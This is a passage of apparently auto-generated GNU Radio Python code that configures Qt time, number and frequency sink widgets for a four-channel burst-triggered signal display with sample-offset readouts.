alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(5):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_1.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_1.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_1.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_1.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_1.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_1.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_1_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_4.addWidget(self._qtgui_time_sink_x_0_1_1_win, 0, 0, 2, 4)
for r in range(0, 2):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(0, 4):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0_0_0_0_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"Combined", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_stem_plot(False)
if not False:
self.qtgui_time_sink_x_0_1_0_0_0_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_0_0_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0_0_0_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_4.addWidget(self._qtgui_time_sink_x_0_1_0_0_0_0_0_win, 0, 4, 4, 2)
for r in range(0, 4):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(4, 6):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0_0_0_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"CHAN3", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0_0_0_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0_0_0_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0_0_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_stem_plot(False)
if not False:
self.qtgui_time_sink_x_0_1_0_0_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_0_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0_0_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_3.addWidget(self._qtgui_time_sink_x_0_1_0_0_0_0_win, 0, 3, 1, 1)
for r in range(0, 1):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0_0_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"CHAN2", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0_0_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0_0_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0_0_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0_0_0.enable_stem_plot(False)
if not False:
self.qtgui_time_sink_x_0_1_0_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_0_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_3.addWidget(self._qtgui_time_sink_x_0_1_0_0_0_win, 0, 2, 1, 1)
for r in range(0, 1):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"CHAN1", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0_0.enable_stem_plot(False)
if not False:
self.qtgui_time_sink_x_0_1_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_3.addWidget(self._qtgui_time_sink_x_0_1_0_0_win, 0, 1, 1, 1)
for r in range(0, 1):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"CHAN0", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0.enable_stem_plot(False)
if not False:
self.qtgui_time_sink_x_0_1_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_3.addWidget(self._qtgui_time_sink_x_0_1_0_win, 0, 0, 1, 1)
for r in range(0, 1):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1 = qtgui.time_sink_f(
8192, #size
samp_rate, #samp_rate
"", #name
4 #number of inputs
)
self.qtgui_time_sink_x_0_1.set_update_time(0.010)
self.qtgui_time_sink_x_0_1.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_1.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, thresh, trig_delay, trig_channel, "")
self.qtgui_time_sink_x_0_1.enable_autoscale(True)
self.qtgui_time_sink_x_0_1.enable_grid(False)
self.qtgui_time_sink_x_0_1.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1.enable_control_panel(False)
self.qtgui_time_sink_x_0_1.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0_1.disable_legend()
labels = ['Chan0', 'Chan1', 'Chan2', 'Chan3', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(4):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_1.addWidget(self._qtgui_time_sink_x_0_1_win, 0, 0, 1, 4)
for r in range(0, 1):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(0, 4):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_0_1 = qtgui.time_sink_f(
1024, #size
samp_rate, #samp_rate
"", #name
1 #number of inputs
)
self.qtgui_time_sink_x_0_0_1.set_update_time(0.010)
self.qtgui_time_sink_x_0_0_1.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_0_1.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_0_1.enable_tags(-1, True)
self.qtgui_time_sink_x_0_0_1.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, thresh, 0, 0, "")
self.qtgui_time_sink_x_0_0_1.enable_autoscale(True)
self.qtgui_time_sink_x_0_0_1.enable_grid(False)
self.qtgui_time_sink_x_0_0_1.enable_axis_labels(True)
self.qtgui_time_sink_x_0_0_1.enable_control_panel(False)
self.qtgui_time_sink_x_0_0_1.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0_0_1.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_0_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_0_1.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_0_1.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_0_1.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_0_1.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_0_1.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_0_1.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_0_1_win = sip.wrapinstance(self.qtgui_time_sink_x_0_0_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_time_sink_x_0_0_1_win, 4, 3, 2, 1)
for r in range(4, 6):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_0_0 = qtgui.time_sink_f(
1024, #size
samp_rate, #samp_rate
"", #name
1 #number of inputs
)
self.qtgui_time_sink_x_0_0_0.set_update_time(0.010)
self.qtgui_time_sink_x_0_0_0.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, thresh, 0, 0, "")
self.qtgui_time_sink_x_0_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_0_0.enable_grid(False)
self.qtgui_time_sink_x_0_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_0_0.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_time_sink_x_0_0_0_win, 4, 2, 2, 1)
for r in range(4, 6):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_0 = qtgui.time_sink_f(
1024, #size
samp_rate, #samp_rate
"", #name
1 #number of inputs
)
self.qtgui_time_sink_x_0_0.set_update_time(0.010)
self.qtgui_time_sink_x_0_0.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, thresh, 0, 0, "")
self.qtgui_time_sink_x_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_0.enable_grid(False)
self.qtgui_time_sink_x_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_0.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_time_sink_x_0_0_win, 4, 1, 2, 1)
for r in range(4, 6):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0 = qtgui.time_sink_f(
1024, #size
samp_rate, #samp_rate
"", #name
1 #number of inputs
)
self.qtgui_time_sink_x_0.set_update_time(0.010)
self.qtgui_time_sink_x_0.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, thresh, 0, 0, "")
self.qtgui_time_sink_x_0.enable_autoscale(True)
self.qtgui_time_sink_x_0.enable_grid(False)
self.qtgui_time_sink_x_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0.enable_control_panel(False)
self.qtgui_time_sink_x_0.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_time_sink_x_0_win, 4, 0, 2, 1)
for r in range(4, 6):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_number_sink_0 = qtgui.number_sink(
gr.sizeof_float,
0,
qtgui.NUM_GRAPH_NONE,
3
)
self.qtgui_number_sink_0.set_update_time(0.10)
self.qtgui_number_sink_0.set_title("samp_offset")
labels = ['0 to 1', '0 to 2', '0 to 3', '', '',
'', '', '', '', '']
units = ['samples', 'samples', 'samples', '', '',
'', '', '', '', '']
colors = [("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"),
("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"), ("black", "black")]
factor = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
for i in xrange(3):
self.qtgui_number_sink_0.set_min(i, -1)
self.qtgui_number_sink_0.set_max(i, 1)
self.qtgui_number_sink_0.set_color(i, colors[i][0], colors[i][1])
if len(labels[i]) == 0:
self.qtgui_number_sink_0.set_label(i, "Data {0}".format(i))
else:
self.qtgui_number_sink_0.set_label(i, labels[i])
self.qtgui_number_sink_0.set_unit(i, units[i])
self.qtgui_number_sink_0.set_factor(i, factor[i])
self.qtgui_number_sink_0.enable_autoscale(False)
self._qtgui_number_sink_0_win = sip.wrapinstance(self.qtgui_number_sink_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_2.addWidget(self._qtgui_number_sink_0_win, 9, 0, 1, 3)
for r in range(9, 10):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(0, 3):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self.qtgui_freq_sink_x_0_1_0 = qtgui.freq_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_freq_sink_x_0_1_0.set_update_time(0.010)
self.qtgui_freq_sink_x_0_1_0.set_y_axis(-140, 10)
self.qtgui_freq_sink_x_0_1_0.set_y_label('Relative Gain', 'dB')
self.qtgui_freq_sink_x_0_1_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, "")
self.qtgui_freq_sink_x_0_1_0.enable_autoscale(False)
self.qtgui_freq_sink_x_0_1_0.enable_grid(False)
self.qtgui_freq_sink_x_0_1_0.set_fft_average(1.0)
self.qtgui_freq_sink_x_0_1_0.enable_axis_labels(True)
self.qtgui_freq_sink_x_0_1_0.enable_control_panel(False)
if not False:
self.qtgui_freq_sink_x_0_1_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_freq_sink_x_0_1_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_freq_sink_x_0_1_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_freq_sink_x_0_1_0.set_line_label(i, labels[i])
self.qtgui_freq_sink_x_0_1_0.set_line_width(i, widths[i])
self.qtgui_freq_sink_x_0_1_0.set_line_color(i, colors[i])
self.qtgui_freq_sink_x_0_1_0.set_line_alpha(i, alphas[i])
self._qtgui_freq_sink_x_0_1_0_win = sip.wrapinstance(self.qtgui_freq_sink_x_0_1_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_freq_sink_x_0_1_0_win, 0, 3, 2, 1)
for r in range(0, 2):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_freq_sink_x_0_1 = qtgui.freq_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_freq_sink_x_0_1.set_update_time(0.010)
self.qtgui_freq_sink_x_0_1.set_y_axis(-140, 10)
self.qtgui_freq_sink_x_0_1.set_y_label('Relative Gain', 'dB')
self.qtgui_freq_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, "")
self.qtgui_freq_sink_x_0_1.enable_autoscale(False)
self.qtgui_freq_sink_x_0_1.enable_grid(False)
self.qtgui_freq_sink_x_0_1.set_fft_average(1.0)
self.qtgui_freq_sink_x_0_1.enable_axis_labels(True)
self.qtgui_freq_sink_x_0_1.enable_control_panel(False)
if not False:
